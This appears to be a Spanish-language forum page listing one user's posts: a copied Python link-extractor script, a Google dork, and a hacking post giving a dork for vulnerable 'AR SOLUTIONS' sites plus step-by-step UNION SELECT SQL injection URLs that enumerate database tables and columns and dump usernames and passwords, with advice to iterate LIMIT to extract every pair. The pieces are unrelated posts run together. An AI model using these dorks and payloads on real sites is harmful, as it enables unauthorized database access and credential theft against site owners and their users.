166
Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.
#!/usr/bin/python
"""Extract list of URLs in a web page
This program is part of "Dive Into Python", a free Python book for
experienced programmers. Visit http://diveintopython.org/ for the
latest version.
"""
__author__ = "Mark Pilgrim ([email protected])"
__version__ = "$Revision: 1.2 $"
__date__ = "$Date: 2004/05/05 21:57:19 $"
__copyright__ = "Copyright (c) 2001 Mark Pilgrim"
__license__ = "Python"
from sgmllib import SGMLParser
import sys
if len(sys.argv) != 2:
print "\n\n+++++++++++++++++++++++++++++++++++++++++++++++++++++"
print "Extract links form webpage - v.0.1 "
print "+++++++++++++++++++++++++++++++++++++++++++++++++++++"
print "\nUsage : ./list-urls.py <web-page> "
print "Eg: ./list-urls.py http://www.whoppix.net "
print "\n+++++++++++++++++++++++++++++++++++++++++++++++++++++"
sys.exit(1)
class URLLister(SGMLParser):
def reset(self):
SGMLParser.reset(self)
self.urls = []
def start_a(self, attrs):
href = [v for k, v in attrs if k=='href']
if href:
self.urls.extend(href)
if __name__ == "__main__":
import urllib
print "\n##########################################################"
print "# #"
print "# Extract URLS from a web page #"
print "# [email protected] #"
print "# #"
print "##########################################################\n"
link = sys.argv[1]
try:
usock = urllib.urlopen(link)
parser = URLLister()
parser.feed(usock.read())
parser.close()
usock.close()
for url in parser.urls: print url
except:
print "Could not reach "+ sys.argv[1]+ " !"
print "Did you remember to put an http:// before the domain name?"
http://www.youtube.com/watch?v=KJCnUlv-Xj4
allinurl:/read_dump.php?
**********************************************
********************ruben_linux***************
**********************************************
******vulnerable a injeccion remota SQL*******
autor==>ruben_linux
equipo=>ruben_linux
- DORK: "AR SOLUTIONS" inurl:viewnews.php?id=
- URL: http://**********/viewnews.php?id=[sqli]
- EJEMPLO:
http://***********/viewnews.php?id=253+and+1=0+1,2,3,4,5,6,7,8,9,10,11,12--
***********************************************
******************ruben_linux******************
***********************************************
http://www.xxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+1--
http://www.xxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables--
http://www.xxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns--
http://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+concat_ws(char(58),nick,PASSWORD)+from+usuarios+limit+0,1--vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:pass